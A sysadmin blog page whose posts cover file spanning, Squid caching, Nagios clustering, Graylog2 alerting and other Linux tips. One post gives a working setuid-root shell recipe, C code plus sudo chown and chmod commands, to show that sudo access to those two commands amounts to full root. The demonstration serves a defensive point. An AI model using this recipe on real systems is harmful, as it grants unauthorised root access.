Spanning files over multiple smaller devices   3 comments

Imagine you are in Tasmania and need to move 35TB (1 million files) to S3 in the Sydney region. The link between Tasmania and continental Australia will undergo maintenance in the next month, which means either one or both:

  • You cannot use network links to transfer the data
  • Tasmania might be drifting further away from the mainland now that it is untethered

In short, I’m going to be presented with a bunch of HDs and I need to copy the data on them, fly to Sydney and upload the data to S3. If the HD given would be 35TB I could just copy the data and be done with it – no dramas. Likely though, the HDs will be smaller than 35TB, so I need to look at a few options of doing that.

Things to consider are:

  • Files should be present on the HDs in their original form – so they can be uploaded to S3 directly without needing a staging space for unzipping etc
  • HDs should be accessible independently, in case a HD is faulty I can easily identify what files need copying again
  • Copy operation should be reproducible, so previous point could be satisfied if anything goes wrong in the copying process
  • Copying should be done in parallel (it’s 35TB, it’ll take a while)
  • It has to be simple to debug if things go wrong

LVM/ZFS over a few HDs

Building a larger volume over a few HDs require me to connect all HDs at the same time to a machine and if any of them fail I will lose all the data. I decide to not do that – too risky. It’ll also be difficult to debug if anything goes wrong.

tar | split

Not a bad option on its own. An archive can be built and split into parts, then the parts could be copied onto the detination HDs. But the lose of a single HD will prevent me from copying the files on the next HD.

tar also supports -L (tape length) and can potentially split the backup on its own without the use of split. Still, it’ll take a very long time to spool it to multiple HDs as it wouldn’t be able to do it in parallel. In addition, I’ll have to improvise something for untarring and uploading to S3 as I will have no staging area to untar those 35TB. I’ll need something along the lines of tar -O -xf ... | s3cmd.

tar also has an interesting of -L (tape length), which will split a volume to a few tapes. Can’t say I am super keen using it. It has to work the first time.

Span Files

I decided to write a utility that’ll do what I need since there’s only one chance of getting it right – it’s called span-files.sh. It operates in three phases:

  • index – lists all files to be copied and their sizes
  • span – given a maximum size of a HD, iterate on the index and generate a list of files to be copied per HD
  • copy – produces rsync --files-from=list.X commands to run per HD. They can all be run in parallel if needed

The utility is available here:
https://github.com/danfruehauf/Scripts/tree/master/span-files

I’ll let you know how it all went after I do the actual copy. I still wonder whether I forgot some things…

Posted February 7, 2016 by malkodan in System Administration

Tagged with , , , , ,

Privilege Escalation – be slack and pay for it   4 comments

My predecessor(s) had left a bunch of people at my work place (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.

I had to demonstrate it. So I did:

cat <<EOF >> make-me-root.c
#include <unistd.h>
int main() {
    setuid(0);
    execv("/bin/bash", NULL);
    return 0;
}
EOF

gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root

./make-me-root

Alright, demonstrated. Now it’s time for the raising eyebrows to follow.

And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.

Posted January 30, 2015 by malkodan in Linux

Tagged with , , ,

Apache, Squid, Tomcat   2 comments

This is going to be a quick “grocery list” to get a configuration of Apache -> Squid -> Tomcat going, allowing for a cache of multiple webapps at the same time.

The Common Case – Apache & Tomcat

Commonly people would have a configuration of Apache -> Tomcat serving web applications. However sometimes you would like to add that extra bit of simple caching for that webapp. Sometime it can really speed up things!!

Assuming you have Tomcat all configured and serving a webapp on http://localhost:8080/webapp and a vhost in apache which would look like:

<VirtualHost *:80>
  ServerName www.webapp.com

  LogLevel info
  ErrorLog /var/log/apache2/www.webapp.com-error.log
  CustomLog /var/log/apache2/www.webapp.com-access.log combined

  ProxyPreserveHost On

  ProxyPass           /webapp http://localhost:8080/webapp
  ProxyPassReverse    /webapp http://localhost:8080/webapp

  RewriteEngine On
  RewriteOptions inherit
  RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
  RewriteLogLevel 0

</VirtualHost>

Simple! Just forward all /webapp requests to http://localhost:8080/webapp

Squid In The Middle

A simple squid configuration for us would look like:

# some boilerplate configuration for squid
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl localnet src 10.0.0.0/8
acl localnet src 172.16.0.0/12
acl localnet src 192.168.0.0/16
acl Safe_ports port 80
acl Safe_ports port 443	
acl Safe_ports port 8080-8100 # webapps
acl purge method PURGE
acl CONNECT method CONNECT

http_access allow manager localhost
http_access deny manager
http_access allow purge localhost
http_access deny purge
http_access deny !Safe_ports
http_access allow localhost
http_access allow localnet
http_access deny all

icp_access allow localnet
icp_access deny all
http_port 3128

hierarchy_stoplist cgi-bin ?
access_log /var/log/squid/access.log squid
hosts_file /etc/hosts
coredump_dir /var/spool/squid3

# adjust your cache size!
cache_dir ufs /var/cache/squid 20480 16 256
cache_mem 5120 MB

#################################
# interesting part start here!! #
#################################
# adjust this to your liking
maximum_object_size 200 KB

# required to handle same URL with different parameters differently
# so for instance these two following URLs are treated as distict URLs, hance they will
# be cached separately
# http://localhost:8080/webapp/a?param=1
# http://localhost:8080/webapp/a?param=2
strip_query_terms off

# just for some better logging
logformat combined %>a %ui %un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh

# refresh_pattern is subject to change, but if you decide to cache a webapp, you must make sure it actually gets cached!
# many webapps do not like to get cached, so you can play with all sorts of parameters such as override-expire, ignore-reload
# and ignore-no-cache. the following directive will SURELY cache any page on the following webapp for 1 hours (60 minutes)
# adjust the regexp(s) below to suit your own needs!!
refresh_pattern http://localhost:8080/webapp/.* 60 100% 60 override-expire ignore-reload ignore-no-cache

Now, we need to plug apache to use the above squid configuration. Luckily it’s pretty simple, the only line you need is:

# basically every request going to http://localhost:8080/webapp, pass via squid
ProxyRemote http://localhost:8080/webapp http://localhost:3128

And the whole vhost again:

<VirtualHost *:80>
  ServerName www.webapp.com

  LogLevel info
  ErrorLog /var/log/apache2/www.webapp.com-error.log
  CustomLog /var/log/apache2/www.webapp.com-access.log combined

  ProxyPreserveHost On
  ProxyRemote http://localhost:8080/webapp http://localhost:3128

  ProxyPass           /webapp http://localhost:8080/webapp
  ProxyPassReverse    /webapp http://localhost:8080/webapp

  RewriteEngine On
  RewriteOptions inherit
  RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
  RewriteLogLevel 0

</VirtualHost>

That’s it, now look at /var/log/squid/access.log and look for TCP_MEM_HIT and TCP_HIT. If you’re still getting TCP_MISS and the like, you’ll have to adjust your refresh_pattern in the squid configuration.

Multiple Webapps?

Not a problem if you have multiple webapps, if you want them to be cached, just add the magic line passing them through squid and the relevant squid refresh_pattern.

Don’t want a webapp to be cached? Just bypass the squid!

Posted April 27, 2014 by malkodan in Linux, System Administration

Tagged with , , , , ,

Ninja Merge   Leave a comment

Recently I was presented with the following situation at work:

  • Your input is a handful of directories, filled with files, some of them are a “sort of a copy” of the other
  • Your output should be one directory with all the files from the source directories merged into it
  • The caveat is – if any of the files collide, you must mark them somehow for inspection

So that sounds pretty simple, isn’t it? In my case the input was millions of files. I’m not sure about the exact number, it doesn’t matter. The best solution for this problem is to never get to this situation, however sometimes you just inherit stuff like that at a new work place.

The Solution

We needed a ninja. I called it ninja-merge.sh. It is a Bash wrapper for rsync that will merge directories one by one into a destination directory and handle the collisions for you using a checksum function (md5 was “good enough” for that task).

Get ninja-merge.sh here:
https://github.com/danfruehauf/Scripts/tree/master/ninja-merge

It even has unit tests and the works. All that you have to do is specify:

  • A list of source directories
  • A destination directory
  • A directory to store the collisions

If a path collided, you might end up with something like that in your collision directory:

$ cd collision_directory && find . -type f
./a/b/filename1.nc.345c3132699d7524cefe3a161859ebee
./a/b/filename1.nc.259974c1617b40d95c0d29a6dd7b207e

Sorting the collisions is something you’ll have to do manually. Sorry!

Stronger password hashing – an abstract idea   7 comments

Proper disclosure: I am by no means an expert in cryptography (Math) and the following is just an idea I had after reading the article of how crackers make mince out of our passwords.

The Problem

Password hashes, strong as they may seem today, are becoming weaker every day. When I heard about numbers like 2 billion password hashes per second, I’m rather amazed. Technology has advanced. The thing is, today it may be 2 billion, but sooner than later it’ll be 10, 20, 100, or more. Sooner than we expect. Inspired a bit by the Bitcoin nonces I had this idea, which may or may not be good, I’m not here to judge. As said – I’m not an expert in cryptography.

I feel rather humble after reading that article. I know that cryptography is not engineering, but math. However with my experience in the computers field, it seems like sometimes you need a touch of engineering to adopt things to the real world. I bet in cryptography courses in university no one really teaches you how to implement password crackers using GPUs, or do they?

Abstract

The problem today with password hashing is that we totally rely on the strength of the hash. With that logic, SHA2048 > SHA1024 > SHA512 > SHA256, you get the point. With GPU technology found today, we can either scale up with our hashing algorithm, or we can simply come with a method that’ll involve “more work”. I want to introduce a method which will help (possibly) to secure the storage of passwords.

Inspired by the Bitcoin proof of work, adding nonces every time to find new hashes, I thought about the following (abstract) algorithm to hash a password:

hash_password(plain_password, hashed_password, cpu_ticks_used)
  if (enough_cpu_ticks_used <= cpu_ticks_used)
    return hashed_password
  else
    return hash_password(
      plain_password,
      HASH(hashed_password + plain_password),
      cpu_ticks_used + cpu_ticks_used_for_hashing)

// Run with:
my_password = hash_password(&quot;P4ssw0rd&quot;, &quot;&quot;, A_LARGE_ADJUSTED_NUMBER)

What I'm trying to do here, is basically run a password enough time through a hashing function, until it is satisfactory for us (in terms of CPU/GPU power used nowadays) in terms of work. So as CPU/GPU power is becoming stronger, enough_cpu_ticks_used should increase.

Verifying Passwords

That’s the rather tricky part. As said before it’s just some food for thought. When verifying a password, obviously the exact same has to be done, except that if you have passwords of different strength, different cpu_ticks_used, for verifying you obviously have to invest enough time until you get to the password, which obviously increases the load on machines implementing this scheme.

Problems

Probably many!!

Things I can’t answer:

  • Is running SHA/MD5 over and over can weaken the final hash?
  • If the client has to authenticate (calculate the hash), how deep of a hash does he need to calculate?
  • If a stored password is “too weak” for the current day, you cannot rebuild the password, as you need the plain part, what do you do then?
  • No idea, help me list more limitations, or perhaps disproof all of this?

In the end of the day it wouldn’t protect us from the most simple and stupid password breaches, such as dictionary attacks and such, what it does counter is the crackers’ ability to run gazillion of hashes per second on a compromised password database.

I don’t come with all the answers, this is just something I had in the back of my head for a while and wanted to share, feel free to bash me if it is a stupid idea.

Posted July 1, 2013 by malkodan in System Administration

Tagged with , , , , , , ,

Bloody Hell, Indent Your Scripts!!!   Leave a comment

Every so often I come across Bash scripts which are written as if Bash is a pile of rubbish and you just have to mould something ugly with it.

True, Bash is supposedly not the most “powerful” scripting language out there, but on the other hand if you’re using traditional methods then you can avoid installing gazillion ruby gems or perl/python modules (probably not even using RPM or DEB!!) just to configure your system. Bash is simple and can be elegant. But that’s not the point.

The point is that too often Bash scripts which people write have zero maintainability and readability. Why is that??

I’m not going to point at any bad examples because that’s not a very nice thing to do, although I can and easily.

Please do follow these three simple guidelines and you’ll get 90% of the job done in terms of maintainability and readability:

  • Functions – Write code in functions. Break your code into manageable pieces, like any other programming language, ey?
  • Avoid global variables – Global variables just make it all too complicated to follow what’s going on where. Sometimes they are needed but you can minimize the use of them.
  • INDENTATION – INDENT YOUR BLOODY CODE. If you have an if or for or what not, please just indent the block under it. It’s that simple and makes your code so much more readable.

That was my daily rant.

My Bash coding (or scripting) conventions cover a bit more and can be found here:
https://github.com/danfruehauf/Scripts/tree/master/bash_scripting_conventions

Fault Tolerant Nagios Cluster

I’ve been searching for a while for a solution of “how to build a fault tolerant Nagios installation” or “how to build a Nagios cluster”. Nada.
The concept is very simple, but it seems like the implementation lacks a bit, so I’ve decided to write a post about how I am doing it.

Cross Site Monitoring

The concept of cross site monitoring is very simple. Say you have nagios01 and nagios02, all that you have to setup is 2 tests:

  • nagios01 monitors nagios02
  • nagios02 monitors nagios01

Assuming you have puppet or chef managing the show, just make nagios01 and nagios02 (or even more nagiosXX servers) identical. Meaning all of them have the same configuration and can monitor all of your systems. A clone of each other if you’d like to call it that way.
Lets check the common use cases:

  • If nagios01 goes down you get an alert from nagios02.
  • If nagios02 goes down you get an alert from nagios01.

Great, I didn’t invent any wheel over here.
The main problem in this configuration is that if there is a problem (any problem) – you are going to get X alerts. X being the number of nagios servers you have.

Avoiding Duplicate Alerts

For the sake of simplicity, we’ll assume again we have just 2 nagios servers, but this would obviously scale for more.
What we actually want to do is prevent both servers from sending duplicate alerts as they are both configured the same way and will monitor the exact same thing.
One solution is to obviously have an active/passive type of cluster and all sort of complicated shenanigans, my solution is simpler than that.
We’ll “chain” nagios02 behind nagios01, making nagios02 fire alerts only if nagios01 is down.
Login to nagios02 and change /etc/nagios/private/resource.cfg, adding the line:

$USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios"
$USER2$ will be the condition of whether or not nagios is up on nagios01.

Still on nagios02, edit /etc/nagios/objects/commands.cfg, replacing your current alerting command to depend on the condition. Here is an example for the default one:

define command{
        command_name    notify-host-by-email
        command_line    /usr/bin/printf "%b" ...
}

Change to:

define command{
        command_name    notify-host-by-email
        command_line    eval $USER2$ || /usr/bin/printf "%b" ...
}

What we have done here is simply configure nagios02 to query nagios01 nagios status before firing an alert. Easy as. No more duplicated emails.

For the sake of robustness, if you would like to configure also nagios01 with a $USER2$ variable, simply login to nagios01, change the alerting command like in nagios02 and have in /etc/nagios/private/resource.cfg:

$USER2$="/bin/false"

Assuming you have puppet or chef configuring all that, you can just assign a master ($USER2$=/bin/false) and multiple slaves that query themselves in a chain.
For example:

  • nagios01 – $USER2$=”/bin/false”
  • nagios02 – $USER2$=”/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios”
  • nagios03 – $USER2$=”/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios && /usr/lib64/nagios/plugins/check_nrpe -H nagios02 -c check_nagios”

Enjoy!

Graylog2 and Nagios Integration   1 comment

Say you have a Nagios system monitoring everything already in your system and in addition to that you have a Graylog2 installation which parses logs from anywhere and provides you with invaluable feedback on what’s really going on in your system.
And then comes the problem, or one of them:

  • Graylo2 is not really good in sending alerts (or maybe it is?)
  • Nagios is already configured to send alerts and you would like to use the same contact groups for instance

The solution is below.

Design

Before making you read through the whole blog entry, I’ll just outline the solution I’ve chosen to implement and you can decide whether it’s good for you or not. Here it is in a nutshell:

  • An alert is being generated in Graylo2 in a configured stream
  • Graylog2 will use exec callback plugin to call an external alerting command, call it graylog2-alert.sh for instance
  • graylog2-alert.sh will push an alert using send_ncsa
  • Nagios parses the alert and notifies whoever is subscribed on that service

Pretty simple and bullet proof.

Graylog2 Configuration

I assume you already have Graylo2 fully configured, in this case download the wonderful exec callback plugin and place it under the plugin/alarm_callbacks directory (under the Graylog2 directory obviously).

Login to Graylog2 and enable under Settings->System the Exec alarm callback.

Click configure and point it to /usr/local/sbin/graylog2-alert.sh

That’s it for now on the Graylog2 interface side.

NSCA – Nagios Service Check Acceptor

Properly configure NSCA to work in your nagios configuration. That means usually:

  • Opening port 5667 (or another port) on your nagios server
  • Choosing a password for symmetrical encryption on the nagios server and the NSCA clients
  • Starting the nsca daemon on the nagios server, so it will accept NSCA communications

Generally speaking configuring NSCA is out of the scope of this article and more information can be found here:
http://www.nsclient.org/nscp/wiki/doc/usage/nagios/nsca

That said, I’ll just mention that when everything works, you should be able to run successfully:

echo "HOSTNAME;SERVICE;2;Critical" | send_nsca -d ';' -H NAGIOS_HOSTNAME

graylog2-alert.sh

On the Graylog2 host, place the following file under /usr/local/sbin/graylog2-alert.sh:

#!/bin/bash

# nagios servers to notify
NAGIOS_SERVERS="NAGIOS_SERVER_1 NAGIOS_SERVER_2 NAGIOS_SERVER_3"
# add a link to the nagios message, so it's easy to access the interface
# on your mobile device once you get an alert
GL2_LINK="http://GRAYLOG_URL/streams"

main() {
	local tmp_file=`mktemp`
	local gl2_topic=`echo $GL2_TOPIC | cut -d'[' -f2 | cut -d']' -f1`
	echo `hostname`";Graylog2-$gl2_topic;2;$GL2_LINK $GL2_DESCRIPTION" > $tmp_file
	local nagios_server
	for nagios_server in $NAGIOS_SERVERS; do
		/usr/sbin/send_nsca -d ';' -H $nagios_server < $tmp_file
	done
	rm -f $tmp_file
}

main "$@"

This in combination of what we did before will fire alerts from Graylo2 -> exec callback plugin -> graylog2-alert.sh -> NSCA -> nagios server.

The nagios side

All you have left to do now is to define services for use with Graylog2 alerts. It is a rather straight forward service configuration for nagios, here is mine (generated puppet in case you wonder):

define service {
        service_description            Graylog2-STREAM_NAME
        host                           REPLACE_WITH_YOUR_GRAYLOG2_HOST
        use                            generic-service
        contact_groups                 Graylog2-STREAM_NAME
        passive_checks_enabled         1
        max_check_attempts             1
        # enable active checks only to reset the alarm
        active_checks_enabled          1
        check_command                  check_tcp!22
        normal_check_interval          10
        notification_interval          10
        # set the contact group
        contact_groups                 Graylog2-STREAM_NAME
        flap_detection_enabled         0
}

define contactgroup{
        contactgroup_name       Graylog2-STREAM_NAME
        alias                   Graylog2-STREAM_NAME
        members                 dan
}

We usually have a contact group per Graylog2 stream. We just associate developers with the topic that’s relevant to them.

Restart your nagios and you’re set. Don’t forget to also start nsca!!

Resetting the alert

Graylog2 and NSCA will never generate “positive” OK alerts, but only critical ones. So you need a mechanism to reset the alert every once in a while. If you will scroll up you will see that I check port 22 (SSH) on the Graylog2 host.
How often you ask?
When configuring a new stream in Graylog2, it is best if you match the Grace period in Graylog2 to the normal_check_interval in nagios. Which would guarantee the alert will be reset before a new one comes in.

Puppet

The whole shenanigans is obviously puppetized in our environment. Tailoring nagios to an environment is usually very different between environments so I have decided it is rather redundant to paste puppet recipes altogether.

I hope you can find this semi-tutorial helpful.

Posted May 26, 2013 by malkodan in Bash, Linux, System Administration

Tagged with , , , , , ,

Hebrew Keyboard Layout In Linux   4 comments

Since I got this question from way too many people, I wanted to just share my “cross distribution” and “cross desktop environment” way of doing that very simple thing of enabling a Hebrew keyboard layout under Linux.

Easy As

After logging into your desktop environment, type this:

setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il

Alt+Shift will get you between Hebrew and English. Easy as.

Sustainability

Making it permanent is just as easy:

mkdir -p ~/.config/autostart && cat <<EOF > ~/.config/autostart/hebrew.desktop
[Desktop Entry]
Encoding=UTF-8
Name=Hebrew
Comment=Enable a Hebrew keyboard layout
Exec=setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il
EOF

Should sustain logout/login, reboots, reinstalls (as long as you keep /home on a different partition), distribution changes and choosing a different desktop environment (KDE, GNOME, LXDE, etc.).

Posted May 3, 2013 by malkodan in Bash, Linux

Tagged with , , , , , ,

Handling many files in one directory   Leave a comment

The Assignment

You have a directory with gazillion files. Since most filesystems are not very efficient with many files in one directory, it is advisable to spread them among a hierarchy of directories. Write a program (or script) which handles a directory with many files and spreads them in an efficient hierarchy.

Does that sounds like a University assignment or something? Yes, it does.

Well apparently such a situation just happened to me in real life. Searching across the internet I couldn’t find anything too useful. And I will stand corrected if there is something which already deals with that problem. Post ahead if so.

And yes, thank god I’m using Unix (Linux), don’t even want to think what one would do on Windows.

The Situation

An application was spooling many files to the same directory, generating up to a million files in the same directory. I’m sorry I cannot disclose any more information about it, but lets just say it is a well known open source application.
Access to these files was obviously fast having ext4 and dir_index, but the directory index is too big to actually list files or do anything else without clogging everything in the system. And we need these files.

So we’ve decided to model the files in a way that’ll be more efficient for browsing and we can then handle it from there.

The Solution

After implementing something pretty quick and dirty for the situation, to mitigate the pain, I’ve sat down and wrote something a bit more generic. I’m happy to introduce the spread_files.sh utility.
What does it take care of:

  • Reading the directory index just once
  • Hierarchy depth as parameter
  • Stacking up to X files per mv command
  • Has recursion in Bash!!
  • Obviously the best solution would be to never get to that situation, however if you do, feel free to use spread_files.sh.